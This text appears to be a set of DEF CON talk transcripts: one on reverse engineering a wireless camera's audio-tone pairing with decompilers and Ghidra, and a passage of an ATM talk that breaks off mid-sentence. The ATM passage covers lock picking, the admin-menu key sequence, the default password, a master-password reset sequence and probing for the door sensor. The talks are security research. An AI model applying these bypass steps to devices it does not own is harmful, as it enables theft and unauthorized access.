deobfuscation process? It's a very slick IDE. It's free, readily available. It receives a lot of support. A lot of people use it. Then you get all the classic IDE functionality like find usages, go to declarations, things like that. With Android in particular, you get a logcat instance or logcat window which lets you search. You can also target specific applications that are running on a phone to reduce the verbosity of the messages that you see. It better help you tailor your analysis. Let's take a look at what we can do with this application. Live log analysis. This is one of the first things I try because being a developer myself, I know that oftentimes the debug logs will contain a wealth of information. As a regular user of the phone or the service or the application, a regular user is not going to see the debug output. If you're rushing or release out the door and you don't disable your debug output, somebody like me is going to come along and hook up the Android phone to logcat and investigate for messages if you're curious about what's going on. Now let's take a look at what logs we get as we start this application. Here's the login screen. Here's a little capture from logcat. We can see that there's some interesting information in there. There appears to be some kind of an encoded payload. There's some interesting strings in there. We appear to be getting both informational and debug output. Here's a URL, the ap.javalife.net, go Javas. As we continue scrolling through the screen, there's a lot more messages like this. When you try the camera pairing process, you have to enter in the SSID and the password. At this stage, we see that there's log output which logs the SSID, the password, and then what appears to be some kind of a randomly generated token. In this log output, I know it's really hard to see here, but there's a class that we can start to investigate. And then there's what appears to be an HTTP helper class which is what helps send and receive messages back from the cloud server. Let's try to pair to a camera and see what we get. There's a button that says, click to send the sound wave. Just love it. It makes me smile when I see that. When we send the sound wave, we get some additional information. It may not look like much, but there are a few strings here which can help in the analysis. We found just to recap what we found so far. We found a distinctive characters. We found URLs. We found a class to investigate this bind device new activity. That sounds particularly fitting, giving that we are trying to enable and configure a new camera device. So what does this lead us? We can continue our search by taking those strings that we found in the log output and searching for them within Android Studio. As I searched through the decompiled output, I found a few things that looks like the number one is used to delimit fields. They call it a smart code. Then there's a string one that's appended at the end of this little message block. Even though Android Studio is calling this message.db. Notify reached, I wonder if this isn't a decompilation artifact of some kind. It really is just the string of the character one. So what is this smart code thing? I noticed that each time I tried to pair the camera to the cloud app, this smart code would change. It would be different every time. And I could see by looking at this boot up code that yes, every time that you attempt to pair the camera, you get characters and numbers for six characters and that constitutes the smart code. But the question still remains like what is this thing? And just after having gone through this entire analysis process and seen it change with every single time that I attempt to pair and noticing that whenever I paired the camera, a message was sent from the application up to the cloud server that included the random code. I can only presume that the backend cloud service uses this random code to tie this camera to my user account in the cloud. Since how else is the camera going to identify that it belongs to my account? So that's the best guess that I have for what this code is used for. As we continue looking through the strings, we can see other strings which guide us to processes, sorry, to functions, methods that warrant further investigation like run and play voice. Both of those sound, you know, they sound good. Let's take a closer look and do an extractive analysis. At this point, we've uncovered a lot of, you know, a lot of functions, a lot of methods, static, you know, constants in the code base. And we want to take, you know, the key sections out of the vendor application, put them in a clean project so that way we can perform an analysis. Just a couple of notes on setting up the clean application. If you're looking at another application, which like this application here, leverages native libraries, you'll need to manually create a JNI Libs folder, put all those compiled libraries into the JNI Libs directory, and then you'll need to make the Java class that matches the package structure has to be the same. So this thing is called like calm.ithink.voice in the vendor application. I can't call it calm.test.reverse engineer. I have to name the package structure the same because the way that JNI works, it requires those two things to match up. And once you have your sample test project set up, you're able to perform a black box analysis of the code that's used to generate the signal. And along this way, one of the questions that I had was, well, what are the exact tones that are being generated by the application to pair and bind with the camera? Well, there's a class called vcode table. And as I ran it in this extracted project, it produced a mapping of all of the tones. All the tones is along with the characters that they map to. So this is what the character is mapped to. We have from 0 to 4875 Hertz. And there are 16 states. So this is a hexadecimal style encoding here. Now looking at what else we found here, there's a lot of findings. We know that Android uses audio track to... We know that the application uses audio track to play a signal. We've identified how it creates the payload as far as the SSID, the password, the random code, and then the delimiters between those fields. We've identified control tones, like the frequency begin and frequency ends that are just static constants. There's also a space tone, which is used for when two tones play back to back the same tone. There's a little space tone that pops in. And that'll be better visualized in all the other slides. There's methods which play the characters. There's the use of CRC values to help the camera know if it's received a complete signal or not. So there's been a wealth of information that we've uncovered through this process. So what do we know now? We can reconstruct all of section one and section two of the signal, because each signal consists of three sections. And now that we can reconstruct section one and section two, really, that just leaves section three. And I've highlighted in this image the part of the signal which is elusive at this stage in the analysis. This tone appears to be some type of error correction code. It doesn't exactly track with the CRC process that the rest of the code base uses, though, which left me wondering. And since this is generated by code that's in a native library, it means that I need binary analysis to dig deeper and try to figure out what's going on here. My tool of choice is Jidra. I don't know how to pronounce that. It's a free tool. It's very capable. And it does the job here. So to get set up with Jidra, you'll want to visit their GitHub page, pull the latest release for your platform, and then follow the installation guide. Once you have Jidra installed, create a new project, fill out all the wizard boxes. I just took basically all the defaults and give it a project name. Click the dragon icon. Import the native library that you want to analyze. In my case, I just went with the x8664 library since I'm a little bit more comfortable with x86 than I am with ARM libraries at the moment. When you click the yes button, it'll go through and it'll do an analysis of this compiled library, which you can then navigate in the UI. So reverse engineering with Jidra. We need to know what we're looking at here. So you want to go to your Android Studio project, make sure that you identify which functions or which methods in the higher level language map to functions in the compiled library. Once you know that, you can look in the symbol tree and you can see here that there's a number of Java, Java com interops, so JNI interfaces here in this native library. The methods that we're looking for are the get and voice structures that are listed towards the bottom of the screen. And here's a closer view on what you would see in Jidra as you do this analysis. So now we just need to pick one of the functions and dig in. I focused on this intuitively named function called get voice struct goki2. So I love the spelling of voice and I don't know what goki2 means. This is the function though that generates the section 2 and section 3 output for the audio signal. One thing that I noticed as I was doing this analysis is that on the Java side, you pass in eight parameters to this native function. Yet on the compiled side, when we look at the function signature in Jidra, there are 10 parameters here. So it seems a little odd, but then doing a little bit of reading, I found that JNI calling conventions add two parameters. There's a JNI environment pointer and then there's an object pointer. And these two parameters are front loaded to the function signature. So those first two are just the environment and the object. So this top picture is the raw decompiled view just with all the generated identifiers that don't really make a lot of sense. The bottom picture shows it refactored in Jidra to indicate that the first two parameters are JNI related. Now let's continue the analysis. So inside of Jidra, there's a function decompiler window. And the nice thing about Jidra, it's like most other IDEs that I've worked with. You can right click on an identifier. You can rename it. You can highlight it. You can do things that will help you analyze the flow of how a particular parameter is used and manipulated. So this function, this get voice-direct goki2, it calls another function that leverages the inputs that are passed into this function. What I do when I do this type of analysis is for each screen that I'm on, I try to do a try to rename and refactor the parameters and the methods, the functions to names that actually make some degree of human sense. So that's what I'll be doing here. This is the cleaned up view. And I know it's small, but the picture shows that each of those parameters are named to reflect what value they represent from the Android side. And then I go from there. I check the usages. This is decompiled. There can be a lot of, sometimes it doesn't exactly make the most sense. Like I noticed that input parameters are copied to local variables. And then those local variables are then used elsewhere. So in the analysis, just keep in mind what you're looking at. Track the flow through the local, through any type of intermediate steps that it goes through to see where it winds up being manipulated. Now this is the raw view of that nested function. Fortunately for me, and almost conveniently so for this demo, this is a very small function. There's only about 58, actually about 56 lines long. So it makes it pretty easy to analyze. You know, again, since the identifiers are all terse and auto-generated, I need to refactor those into something that I can use. So start with what you know, find a good starting point. Even if you can't get all the names to something human-readable, just do what you know. And as you reason through the code, you'll find that the rest of the pieces can fall into place sometimes if you enter what you know. As I went through this and did all the renaming, I found that the critical section, the critical operation that I needed to apply in my reverse engineering project to replicate the Signal 3, it just came down to a shift. So this is the line. It takes the CRCID SSID and then it shifts it to the right. So that's a very simple operation for me to perform in my replicated Android project. It is not something that I was able to figure out just by reasoning through the Java or by passing in inputs to the library function and fuzzing the output. I think probably with enough time, I probably would have figured it out. But you know, just I get a little impatient and when I can go explore a little deeper and more fully understand how something works, I'll take that opportunity. So a shift, that's all I got to do to replicate Section 3. Now let's think about hacking the Signal. How can we recreate this and manipulate it to serve our purposes? So let's look again at what we know. This is the spectrographic waveform of a complete pairing cycle. The waveform is comprised of three sections of hexafide data. Each section is prefixed and suffixed by control codes and section identifiers. We know that when two sequential tones are used, there's a space tone that shows up in between it to help the camera better differentiate and identify distinct signals. The duration of each tone that I found is about 50 to 60 milliseconds. And we know the structure of each waveform section. Let's look at Section 1. This one's a long one. It's got frequency begin. It's got delimited SSID, passphrase, and random code digits. It has CRCs of a bunch of data put together and then it's got end-tones. Section 2 is incredibly simple by comparison. All it's about is the smart code and just making sure that there's a proper error correction on that randomly generated code. So that's very terse, very short, very easy to reason through. Section 3, yeah, this one's a little bit longer as well. We have some CRC codes in there. We have another kind of like a mutilated version of the smart code. There's the passphrase bytes, another CRC, and then this thing wraps up. So we can reproduce the signal now. We know every aspect of every part of the signal and we are able to recreate it as a result. So that's where the demo comes into play here. I created an application which can be used to pair this wireless camera to a wireless network without having to use the cloud application. This enables the camera to be further analyzed using more traditional network style investigation techniques. So with that, let's go ahead and let's take a look at the demo. In this demo, we'll be pairing the wireless camera with a wireless network that's hosted on this laptop running host APD advertising a DEFCON29SSID. To do the pairing, we will leverage the reverse engineered application that I created as part of this kind of reverse engineering process where I've configured the SSID and passphrase. Now to get this camera to pair, we need to wait for it to get into setup mode. After I plug it in, we'll want to wait for the flashing light and at that point the camera should be susceptible to our suggestion that it paired to a specific network. So I'll plug the camera into the power bank and start it up. On boot, the camera shows a solid green light to indicate that it has power. After it goes through its setup sequence, whatever that entails, I can't have it been able to really probe that, it'll go into a flashing light mode where we can pass it along our message. So let's give this a try. Alright, with that tone, it should indicate that the camera has received our pairing message and in the Wireshark capture, you will see that the camera is communicating with the network and that it's paired. So that is looking good. Let's take another look at the pairing, this time from the screen recording that shows the Wireshark output of our packet capture. As the camera goes through its initialization sequence, receives our pairing code, it should show up requesting an address, which in this case I've targeted to be a specific one in advance. You can see here that it receives an IP address on the local demo network and it proceeds to query back home and attempt to call home and do the cloud configuration bit. We're going to try connecting to the camera's video now. One thing I do want to note about this camera is that the video connection can be a little bit iffy, it doesn't always work and can require three, four, sometimes upwards five different attempts to get the video signal to work. Here I'm showing an attempt to connect to the camera using VLC and surprise, surprise, it fires right up. Go figure. Let's go ahead and wrap this up now. There are a few limitations that are worth noting. It's not easy to discover the device's administrative password. It is six hexadecimal characters and the password changes each time the camera is reset. It doesn't seem to be tied to MAC or serial number, so just kind of brute forcing your way through it might be one decent option. The easiest option is just to have it pair once to the cloud and pull the password off of that. That is not the approach that I would prefer if at all possible though. It's not really very easy to decipher the camera to cloud communication based off of some of the code that I've seen in the application and what I've intercepted between the camera and the cloud servers. The camera has a local RSA key pair that changes on reset or potentially between each request. The payloads are encrypted and sent over to the server. Even though you can view the payloads by setting up a self-signed demand in the middle server, you can't really make sense of what the payloads are saying. So it could be worth some additional investigation. You also get what you pay for. Even if you know the password, it doesn't always connect. VLC will sometimes connect and sometimes it will not. So just keep that in mind if you want to economize and save a buck or two on a cheap wireless camera. So thank you very much for attending my DEF CON talk. It's been a real pleasure to spend this time with you today. Until next time, bye!
|
All I wanted was a camera to monitor my pumpkin patch for pests, what I found was a wireless security camera that spoke with an accent and asked to speak with my fax machine. Join me as I engage in a signals analysis of the Amiccom 1080p Outdoor Security Camera and hack the signal to reverse engineer the audio tones used to communicate and configure this inexpensive outdoor camera. This journey takes us through spectrum-analysis, APK decompiling, tone generation in Android and the use of Ghidra for when things REALLY get hairy. REFERENCES: - JADX: Dex to Java Decompiler - https://github.com/skylot/jadx - Efficiency: Reverse Engineering with ghidra - http://wapiflapi.github.io/2019/10/10/efficiency-reverse-engineering-with-ghidra.html - Guide to JNI (Java Native Interface) - https://www.baeldung.com/jni - JDSP - Digital Signal Processing in Java - https://psambit9791.github.io/jDSP/transforms.html - Understanding FFT output - https://stackoverflow.com/questions/6740545/understanding-fft-output - Spectral Selection and Editing - Audacity Manual - https://forum.audacityteam.org/viewtopic.php?t=100856 - Get a spectrum of frequencies from WAV/RIFF using linux command line - https://stackoverflow.com/questions/21756237/get-a-spectrum-of-frequencies-from-wav-riff-using-linux-command-line - How to interpret output of FFT and extract frequency information - https://stackoverflow.com/questions/21977748/how-to-interpret-output-of-fft-and-extract-frequency-information?rq=1 - Calculate Frequency from sound input using FFT - https://stackoverflow.com/questions/16060134/calculate-frequency-from-sound-input-using-fft?rq=1 - Introduction - Window Size - https://support.ircam.fr/docs/AudioSculpt/3.0/co/Window%20Size.html - Android: Sine Wave Generation - https://stackoverflow.com/questions/11436472/android-sine-wave-generation - Android Generate tone of a specific frequency - https://riptutorial.com/android/example/28432/generate-tone-of-a-specific-frequency - Android Tone Generator - https://gist.github.com/slightfoot/6330866 - Android: Audiotrack to play sine wave generates buzzing noise - https://stackoverflow.com/questions/23174228/android-audiotrack-to-play-sine-wave-generates-buzzing-noise
|
10.5446/54233 (DOI)
|
Hi everyone, my name is Roy Davis and welcome to my talk No Key, No Pin, No Combo, No Problem. Ponying ATMs for fun and profit. Shout out to all my homies at DC612 in Minnesota and for anybody who wants to get a hold of me about the content of this presentation, my contact information is all on the screen there. Before we get too far into this, I've got to say this content is provided for educational and entertainment purposes only. Unauthorized access of other people's ATMs is illegal. Don't do it. Don't do it. You're going to go to jail. Secondly, this presentation is not associated with my employer in any way, except to say they've been very supportive of this opportunity and of me and I really appreciate that. So why ATMs? There are several answers to this question. The first being when I was a kid, I used to go to the grocery store with my mom and she'd walk up to this machine once in a while and set instant cash on the front and I thought, man, this is great. How do I get a piece of this action? I want instant cash and a long time went by. I graduated college. I got into security and I got into pen testing. I never forgot about that childhood dream. I always wanted to learn how those things work inside. How can they be configured or misconfigured? What does their network traffic look like and how secure is that vault? In my opinion, cash is not going away anytime soon. Cash still provides a level of anonymity to people who use it that cards just don't give you. They leave a paper trail. ATMs are everywhere, all over the world and increasing in numbers. As you can see in this chart between 2008 and 2019, about a doubling of the number of ATMs. A lot of people think that on these machines in bars and restaurants and wherever that as long as this thing keeps working, it's good. The low levels of security maintenance adoption for these machines is incredible. If you think it's hard to get PC users or like an InfraOps team to apply patches in production, imagine trying to get bar owners to update their ATM software. It's really difficult. Also a lot of ATM security seems to me based on obscurity and lack of design transparency. There's missing huge amounts of documentation. Try searching the internet sometime for communications protocols or encryption implementations or main board pin layouts. It's really difficult to find anything about that. This is a document I found from 2002 discussing the Triton-COM protocol. It's a preliminary release and it's missing a lot of current info. I also believe that if honest researchers continue to expose vulnerabilities in these devices, the increased awareness can only serve to encourage the manufacturers of these devices to make them more secure, which makes all of us safer in the long run. The last reason I'm interested in this kind of research is really all of these folks. A huge shout out and thank you to these pioneers in the ATM and electronic lock research field. They paved the way to establishing safe harbor for ATM vulnerability research and I greatly appreciate and have enjoyed all of their work. I highly recommend watching these previous presentations. If you want to learn more about things like ATM history, network attacks, firmware attacks, power analysis, and spike attacks, and malware attacks. All of these previous researchers are brilliant and in my estimation, most of it is probably beyond the capabilities of your average criminal. Today we're going to look at something a bit more on the physical side of attacks on ATM. Our agenda here is all about how I acquired my ATM. We'll look at some damage, some waves. We'll damage these things trying to get the money, some general ATM info. How I became a licensed operator and how that went and why I did that. We're also going to be picking the ATM case lock, resetting the ATM password, and bypassing the electronic ball lock. And then at the end we'll have some time for Q&A. All right, so what was my goal? It was a fully functioning ATM in my home, which I had complete access to. A total process ATM transactions just like in the wild. And I want to research and understand the entire tax surface, including the network traffic, the internal serial comms, the data stored on the device, the vault, and the cash dispensing unit. So what I have here behind me is that device. It came true and I'm going to tell you how that happened. These things are expensive, right? How did I get this thing? If you look on the internet, this thing, probably $4,000 new, couple grand, two, three thousand used. That's too much for me if I'm going to do some research. So things like Craigslist and eBay are your friends. I'd been looking for an ATM for a long time when I found this one in 2018. This set $100 for both. It seemed like a deal. I quickly started researching how they worked and what was inside them and how to duplicate the attacks. Barnaby Jack had done in 2010. One of the things I found right away, default locks on these machines are garbage, commonly available locks and easy to pick with a rake. Also among other issues, I found that the audit logs in these ATMs contain a wealth of information including full debit card numbers and names of previous users in clear text and dates and amounts of transactions. That was sort of surprising to me. And so I got bored with these things as time went by. I really was interested in getting my hands on an ATM that ran some flavor of Windows because Windows, Fund a Hack and lots of known forms. This saved search. I had an alert that was turned on. Any auction or ATMs for sale in Minnesota. And lo and behold, I got a hit. So here's this auction in Cambridge, Minnesota, about an hour and a half north of me. And they were selling everything in this restaurant and gas station. This ATM was up for bid. And this is all the details I got. If you've ever bid on auctions like this, you know that there's a very limited amount of information. I called the place and inquired about the condition of the ATM asking, you know, what does unknown working condition mean? They had no idea. You know, everything is being sold as is. It's at foreclosure auctions, all they said. I did ask if there was any money in it, just kind of joking. The reply surprised me. They're very well maybe. This place got shut down with food on the shelves, drinks in the coolers and gas in the tanks. So at this point, I have no idea. I think they're just trying to get me to bid, right? Tell me whatever I want to hear. I bid $1. Now I am quite competitive when it comes to auctions and I don't like to lose. So of course I won with a bid of $220 at the last second. This is the first time I learned this email, learned that I won. And I also learned there's no code for the cash box. I assume they mean the vault. Well, what's going on here? I have no idea. What's this thing actually worth? Is it worth anything? Am I going to be able to get into it? Does it even work? Who knows? So I did a little digging and found out that first of all, these machines are like 10 times, worth 10 times what I paid for them. So score. But maybe not if I can't get into the vault and I can't get this thing working. Well, where did this thing come from? The gas station barbecue sounded sort of interesting. Here's the place that was auctioning off everything. I hit opened in 2018, February 1st, less than two years before I won this auction. Very strange. They're going to have Dickies Barbecue if you've ever had it. It's fantastic. I highly recommend it. March 18, kind of a review of the place. But uh-oh, just a little while later, assets 43K liabilities, 1.5 million. That's probably not going to work out long term for any business owner. Things are starting to make sense here. So hop in the car, hour and a half north to Cambridge, and this is what the place looked like when I got there to pick up my ATM. A lot different than opening day. I walk in and I'm at check-in and I'm talking to the lady there and I say, you know, what happened here? How did this place go out of business so fast that, you know, you couldn't get the ATM pin for the vault or the top? And she says, as I understand it, there were some legal issues and the lender foreclosed and shut the place down. Okay, I don't know anything about all that, but you know, that's what you say. So I go back over to the ATM, let's get this thing going. Let's just get this thing in the Jeep and get out of here. I was not anticipating that it was going to be literally bolted to the floor and completely immovable. Okay. So I can't get into the vault to remove the nuts that are obviously holding this thing down to the floor. It's in cement. So I call the locksmith and I said, hey, you know, I'm at this gas station. I want this auction. Could you please come over and help me break into this ATM to help me move it? The answer was a resounding no. No. So I asked the lady, you know, how am I going to get this thing out of here? What's going to happen to this place? She said, I don't care. You got to have that thing out of here today. I don't care what you do to get it out. I said, what if I have to damage the floor? No problem. They're going to bulldoze this place at some point later. I don't care. I'm just here to auction stuff off. Okay. All right. Well, I want this thing undamaged because I want to do research on it and afterwards I might want to use this thing and like start a business, make some money with an ATM. Who knows? So the only thing I can think of is go down to Home Depot and rent this guy, the Bosch Brute Turbo. Up to this point, I'd never used a jackhammer in my life, but how hard could it be? Right? I've seen it done in cartoons. Well, so I start jackhammering and hitting the ATM a couple of times there and jackhammering some more and I'm getting a little further and jackhammering more and it finally starts to come out and lean a little bit. It finally did fall over and I removed the concrete slab from the bottom. Again, with the jackhammer. For anyone wondering, it takes an novice jackhammer user roughly 40 minutes or so to get an ATM fully extracted from a cement floor. All right. Here it is out on the curb. In the Jeep it goes and magically now it's back that afternoon in my office. Mission accomplished. I plugged it in and booted it up and said, you know, I'm staring at this thing like, okay, so now what? What do I have to do to make this thing fully operational? I want to stick my card in this thing and have it give me money. I have no idea. I have no idea what to do. Time to research. First thing I noticed when I boot this thing up is it's running Windows CE. That's pretty interesting to me. What could possibly go wrong? I was looking for a Windows box. So the next thing I do is hook it up to my local LAN and run an Nmap scan. Now you'll see on the left here that I posted the Nmap scan that Tre and Brenda. So Brenda did last year. Tre Goudin, Coudin, Keon, sorry, and Brenda So at last year's DEF CON. So they had a lot of open ports on this exact same model. I only had 555.5 open, which I learned from their talk is the remote management agent. I did install the remote management software and connect to it, but I did not do any sort of penetration testing against that endpoint. It was very intriguing and very attractive to do that, but it was not the focus of my research at the time. Tre and Brenda also demonstrated an overflow attack against this port that allowed modification of settings within the ATM. I would love to learn more about that and try that attack here. Okay, so here is the screen when I boot up the machine, when I first boot it up. Apologies for the terrible photo. After booting, I get this thing. It says the encrypted pin pad has gone bad. I have no idea what that means. It needs to be replaced. I learned error codes 97999, EPP error. All right, what's this going to cost me? So 320 bucks later, I've got a refurbished one and things are getting a little bit expensive. And so at this point, I've got to install an EPP in a machine that I've never really taken apart or worked on, but at least I know how to get into the top, which we'll see here shortly. First thing I needed to do was a little research on the inside of this machine, and along the way I kind of put together this a few slides about how ATMs work. So before we get too far, let's just take a couple of minutes here. So there's two main categories of ATMs, with its distinguishing factors being the level of security the housing provides for the electronics and the money, the banking features available to users, and the amount of money within the machine itself. Drive-up ATMs are typically associated directly with banks and are mounted in an external wall of a bank, especially built in closure like this one, or as a standalone unit, like out in a parking lot. There's really no easy access to the money or the electronics in the front of this machine. You really have to get into the building or get into the back somehow. Stealthy undetectable access takes time, knowledge, and skill, or granted access as an employee. The second type of ATM is the one you're probably most familiar with, and it's the type I bought from my research. These are much less expensive, and there's far less security built into them because they're designed to be installed where people are present and are working, like gas stations and such. They usually are not directly associated with any sort of bank, but they're owner-operated, so the gas station owner probably owns that machine as well. It changes the threat model a little bit here because there's much less oversight to detect modifications to the ATM software housing or network connection if this thing is installed in a hotel lobby or a big long hallway at a hotel conference center or somewhere, a bowling alley maybe where there's not a lot of supervision. As we've seen, these things can be bolted directly to the floor, but many times they're not because it's a temporary use location or it's going to be a limited time there or they move it around a lot, or for whatever reason maybe they just can't do that. They can't bolt it to the floor. People trying to get access to the money in these machines do a lot of damage, typically with various devices like blow torches, crowbars. This is actually the same machine I bought. This Triton 9100 looks like somebody used some sort of a cutting tool. I'm not sure why they chose that spot. You can't actually get to the money going through the side there, so they were probably very disappointed or caused more damage to the CDU unit in there. During my research, I see all this damage and I'm thinking, is this really what it takes to get into one of these things? Can you do it any other way? Can you do it in a way that doesn't leave obvious evidence? Maybe the answer is no. I don't know. This one's my personal favorite because I like 4th of July, so anytime you go with explosives I'm going to watch. Not attracting any attention here for sure. Here we stick the incendiary device in the output of where the cash comes out, which is an interesting choice. It just basically destroys the entire top, but the cash box remains intact. That is not a good way to try and get into an ATM. I would be really surprised if anyone here has never used an ATM, so I'm sure you're all familiar with these external parts that I've highlighted here. We're going to go past this. All of the ATMs that you'll see essentially have the same internal parts and external parts. One thing you can see here is the false door, the safe door cover. That is protected by a cylinder lock, which is typically keyed the same as the lock that protects the electronics. Behind that false door is the electronic lock keypad and the lock bolt handle. You can see a wire coming out of the door here. That's a power cable for the light over the cash dispensing portal on the false door. Let's take a look inside the vault. Here we can see the door where the money comes out and dust below that. We can see the bolt action lever that lifts these huge teeth that interlock with the frame to keep the safe door shut. The safe door, by the way, is about 70 pounds. It weighs more than anything else on the machine. There's a look at the electric lock inside. There is what's called the cash dispensing unit. On the cash dispensing unit is also a reject bin. Then there is the cash cassette, which plugs basically into a slot underneath the reject bin. We're going to take a closer look at all of these different things. Inside here you can see the belt-driven device that brings the money up and out of the cash dispensing unit. The next thing we're going to look at here is the reject bin. Not very exciting, but I thought you guys might just like the look in there. This is where crumpled money goes, things that can't go through the CDU. This is the back of the CDU. You can see the serial interface that goes up to the main board and also the power supply, which also goes up to the power supply in the main compartment. This here is the cash cassette. It also is locked with a tubular lock. Inside we can see the pressure-driven dispenser. It's spring-loaded. You can see a few bills in there. This is where 1,000 bills can fit if you so desire. This same machine that I have, even though it right now is configured with one cassette, it can be configured with three cassettes. The module just plugs right in. It's really not a big deal. Using this machine, a cash capacity of $300,000 because each cassette can be configured to hold hundreds. As we're going to see, you make the call at the end of this presentation, do you think that the locks and everything that are protecting $300,000, potentially $300,000, do you think they're adequate or not? Moving on to the top of the device, this lock is, like I said, usually keyed the same as the front. As mentioned, can be picked. I'm showing you there that the lock is indeed locked. I'm showing you there a cylinder lock pick. These cylinder locks have seven or eight pins. This one particularly has eight pins. I insert the pick and I start jiggling it back and forth, which moves the picks up into the right position, which moves the pins into the right position and unlocks the lock. Didn't take very long at all. You could also just buy this key on eBay. If you are lucky enough to get your hands on an ATM like I did for cheap and you don't have the key, here you go, go buy a key. Let's have a look inside here, inside the top. Not many people get to look in here. I figured I'd give you a look here as well. Here are all the wires that go down to the CDU. These come up and there's the printer module, there's the power supply, a straight five volt power supply, I believe, to the board and 12 volts everywhere else. Here is the receipt printer. It has its own board and a serial connection and power cables there. All these cables come up through a junction right at the base of the main unit and there we see the main board. The main board here has an SD card, a lot of dip switches that change modes and do various things. We see an HDMI cable connector and a couple of USB ports. Then over here on the other side, we will see all of the different serial ports that drive the different pieces and parts of the ATM itself. There's the Ethernet cable, there's the modem and the printer port. Down here we have the card reader. That's where all the money comes out and right below there is the encrypted pin pad, the EPP that I replaced. All right, wonderful. We see the inside and I mentioned the Ethernet port. This thing is obviously talking to the internet and it's obviously somehow doing transactions. How does that work? Whether it's through a modem or it's through a NIC or something, we get an internet connection to the PPH, the payment processing host, using something called the Triton protocol. Then from there, we're going to go to what's called the Interbank network. What is that? First of all, the processing host provides the connection information and encryption keys which are configured in the ATM computer. They take a small percentage, the processor does, of the transaction fee which is determined by the owner and charged to the user for each transaction. There's hundreds of processing companies to pick from. I just threw up a few brands here. An Interbank network, the next step is also known as the ATM consortium or the ATM network. It's a computer network that enables ATM cards that are issued by a financial institution that is a member of the network to be used in ATMs that belong to another member of that same ATM consortium. The way that the banking industry came up in America was very fragmented. There was a lot of little mom and pop shops and a lot of little networks everywhere. In the 2000s or 2003, by then, we had a consolidation resulting in three major Interbank networks and now about 70% of the volume in the United States goes over those three networks. Last talks on ATM hacking have discussed building a dummy backend for the ATM network, for the ATM to connect to that would pretend to be the payment processing host. I really wanted to see what the real thing was like. To do this, I had to become a licensed ATM operator. Why did I do that? I really want the full real experience. I want to understand exactly what does it take to take an ATM to full functioning and operate it after the fact. After my research is done, I want to put this thing in use. Minnesota is about to legalize weeds, so maybe I'll put it out of dispensary. Why do I have to be licensed? The primary reason these laws exist and these licenses exist is to prevent money laundering and funding of nefarious activities. This is really tied to the Patriot Act of 2001. You can imagine what I mean by nefarious activities. The licensing is done through NMLS or the National Multi-State Licensing System. I provide processor information, there's a background check, I have to fill out a bunch of paperwork, I have to show them my bank statements and let my bank know what I'm doing. I have to pay a couple hundred bucks in license fees and it takes about four weeks or so and you're going to do something wrong because no matter what you do, you're going to do it wrong and fill out the paperwork wrong and you're going to have to do it back and forth a few times and sit on hold with the state and whatever. Sooner or later, you will become a licensed financial terminal owner. I've got this thing on the network. I have my license. I can connect to the ATM network, the real thing. How am I going to do that? I'm going to use a land tap because I want to do this very transparently and not in any way that somebody can know what I'm doing. There's no opportunity for traffic manipulation here. It's really just sniffing and I'm sniffing my own traffic. As I run my own transactions with my own card, I can see what's happening. The way a land tap works is there's a pass-through that goes directly through and is transparent to the server and the client. These other two ports that you can see are outbound from the ATM, so outbound traffic which goes to my laptop. Then inbound traffic coming inbound to the ATM also goes to my laptop. If I spin up Wireshark and attach to both of those Ethernet devices, I can see both way traffic. The problem is it's encrypted with TLS12. The ATM provides you a way to upload your own signing certificate, which I found very interesting. If you put a self-signed cert on a USB and stick it in to the back where we saw before and you go to this screen, it says download cert from USB. Not really sure how that all makes sense, but it's there. We've taken a little look at the inside. We've taken a little look at the network. With the EPP replaced, I can now successfully boot the ATM and enter some data. One side note here, anytime I see a big red thing that says warning and then do not do something, I always pay special attention to that. I like to do things that I'm not supposed to do. This one says don't remove the cover, bad things will happen. At some point, I'm going to go look exactly into what that bad stuff is and see how this is implemented. It sounds like a really interesting research project. Anyway, booting this time, I get this great error message, says FFF, that means that I need to provide some more setup information into the machine. To access the admin screen, I'll do enter clear cancel 123. This gives me this nice enter password UI, but I don't know the password. This is the pin I need to get to the admin interface. I tried multiple times to reach anyone associated with the previous owner, still no luck. I have no idea. The pin is stored in memory somewhere on that board. I have no idea how to get to it. I don't know if it's encrypted. It's good to note that this password is different than the safe combination. The safe vault lock does not have any idea that this interface or this computer even exists. They're completely separate. This is just to get access to the admin operator interface. The default password here is 555555555555. I know that because it's in their documentation. But unfortunately for me, that didn't work. I tried and I tried and I tried and I was up very late. The UI does give you three chances to enter the correct password, but then it'll send you back to the start screen again and then you have to do enter clear cancel, one, two, three. After a few days of guessing and falling asleep in my chair after guessing, I gave up and looked for other ways. So it turns out after a lot of Googling and reading, I found that in recent versions of the software house song has implemented a security feature where the operator function passwords cannot be reset to factory defaults and less performed during a machine's first boot after reloading the software. If there's any way around this, I have no idea. I couldn't find it. The search continues. All right, so how does the software reinstall work? Well, various versions of the ATM software are available if you search around. I found this one and downloaded it. I would love to find some older versions of this. If anybody knows where I can get my hands on some older versions of this software for the Triton 2700CE, I would really appreciate it. This set that I found was, I think, the most recent version. So I put it on an SD card. There's various files here. If you want to know what they do, I think Brenda So talked about that in last year's talk. I did delve into the update folder where I found a master.zip file and opening that is super fun. There's lots of fun stuff to play with here. I'm not sure if the bat files or some of these other files, the icons in the backgrounds, have any sort of CRC associated with them. If there's anything run on those, if you can modify those and put them back on this disc and stick it in the machine and have it do some fun stuff, that's another research topic altogether that I wish I had time for and will probably do in the future. So my SD card goes in this slot. I have to push down dip switch number four to make it boot into diagnostic mode. And this is where the computer will do all kinds of fun stuff and read things off the SD card. So pick SD card. And now we're doing a software update. This takes about 10 minutes or so. That's what this install looks like. And after you do that, it will reboot and now you'll get the same screen. And we can reset the master password. All right, so here's how we do that. We reboot again. And during the initializing screen, we get out our old Nintendo fingers and do clear, left, right, clear, clear, cancel, clear, left, right, clear, clear, cancel. If successfully recognized, the machine will ask you if you want to reset the master password. And then it will be set back to 5555. There's one caveat to this. It's not going to happen unless the safe door is open. If the safe door is not open, you're just going to get back to this screen. And so at this point, the safe door is not open. But I need to open it. I need to open it and to complete the password reset for the computer, and I need to get into it to see if there's any cash in there, right? I really don't want to destroy the door in the process. I've already explained why. So the first question I have is, how does this computer know the door is closed? There must be a sensor somewhere in there connected to the door, connected to the main board. I have access to the main board. I should be able to do this. So I reached for my favorite tool, the Boroscope. This here is a depth deck unit, 5 megapixels, HD resolution, rechargeable battery, wireless connectivity. It's great. Wire is rigid. You can bend it around corners, and it's $50 on Amazon. How could you go wrong? As we'll see later in this talk, I did use this other tool, this other smaller scope called the autoscope. It's made to stick in your ear. This has a diameter of 5.5 millimeters, much smaller than the previous one. It's about $50 for this camera as well. So I got the scope inside the ATM using the corners of the cash dispensing tray, and also that hole where the wire came up for the lighting of the door. This is what I see inside. It's the reject 